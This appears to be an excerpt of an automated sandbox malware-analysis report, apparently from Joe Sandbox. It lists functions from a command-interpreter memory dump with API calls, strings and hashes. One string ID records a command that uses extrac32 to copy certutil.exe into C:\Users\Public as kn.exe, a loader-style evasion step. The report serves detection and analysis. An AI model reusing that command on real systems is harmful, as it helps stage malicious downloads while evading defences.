                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FAT$~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2238823677-1832570214
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3fc9a69654e0999e81974fe8de99eee517e0562fba3467a43d060cf101c8bdc6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21716B32618BC18AEB21EF21DC602EBB7A4FF46789F849135DA4D4BB59DF38D2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBD840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF706EBFE2A), ref: 00007FF706EBD884
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF706EBFE2A), ref: 00007FF706EBD89D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF706EBFE2A), ref: 00007FF706EBD94D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF706EBFE2A), ref: 00007FF706EBD964
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706EBDB89
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 00007FF706EBDBDF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 00007FF706EBDC63
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT ref: 00007FF706EBDD33
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT ref: 00007FF706EBDE9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF706EBFE2A), ref: 00007FF706EBDF1F
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1051989028-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 83d2e6b80eb9603d8a3f71c235e60d2ff3ea5702132ee743591cbe9e14985e0e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0028136A09B4682EA24AF15EC6027BF6A0FF94B94F945331DA9D07794DF3CE441CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB86B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3223794493-3086019870
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 23aa8375e79f27bd4ede80b8156ef3e10345d22303fd816c0f62b5d71793cf49
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70519F25A08B42C6EB14AB15AC2017BBBA4FF59B94FD85635CA5E073A4DF3CE445C320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC2B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-3124875276
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4d2125c1ecaa67cd59dd69a2b973508792c6f1a7df2824e364ffd51823101f0d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99515D24E0C7438AFB14BF20AC342BBAA90BF55B95FC05035D71E4A2A5DF3CA5469770
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDBFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF706EDC6DB), ref: 00007FF706EC58EF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EC084E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00007FF706EDC1C9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EDC31C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF706EDC5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2242554020-619615743
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f45b04878c373140482bd9bf728b90acdb964024760a201dc50eba82409da46
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4127E65A1875281EA20BB14AC2417BA3A4FF44FE4FE85235DA6E437E4DF3CE546C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC6FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EC7013
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EC7123
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC1EA0: wcschr.MSVCRT(?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF706EE0D54), ref: 00007FF706EC1EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC706E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 00007FF706EC70A5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 00007FF706ECF9DB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706ECFA00
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706ECFA5F
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC823C: FindFirstFileExW.KERNELBASE ref: 00007FF706EC8280
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706EC829D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706EDEAC5,?,?,?,00007FF706EDE925,?,?,?,?,00007FF706EBB9B1), ref: 00007FF706EC3A56
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706ECFA3D
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: \\.\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 799470305-2900601889
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3db15ab557e2e3ffb4c97bc6f2d5bc8e4c2b62e3e7f52a40e25e558ef806ecb4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5251B932A08B8286EF60AF24DC202BAF7A1FF85B64F854535DA0E47794DF3CD5468720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB8B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1944892715-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a66102e4018c1b0e4353d172b043d29de28c8b8a374d8e305c45668d0cbcabd6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6B1AF65A0974286EA20BF11AC7117BF6A5FF55B94FC89636CA4E4B3D0EF3CE4418720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB5458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EB54DE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF706EB1F7D), ref: 00007FF706EB552B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF706EB1F7D), ref: 00007FF706EB554F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706ED345F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF706EB1F7D), ref: 00007FF706ED347E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF706EB1F7D), ref: 00007FF706ED34C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706ED34DB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF706EB1F7D), ref: 00007FF706ED34FA
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC36EC: _get_osfhandle.MSVCRT ref: 00007FF706EC3715
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC3770
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC3791
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1356649289-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 23135d4e1597b5cd732527a92225e9f8d2c1bff262746bc86ad5bef11780da03
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD916F36A0874287EB14AF21AC2017BF6A1FF89B94F885135DB4E47B94DF3CE4418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED86FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
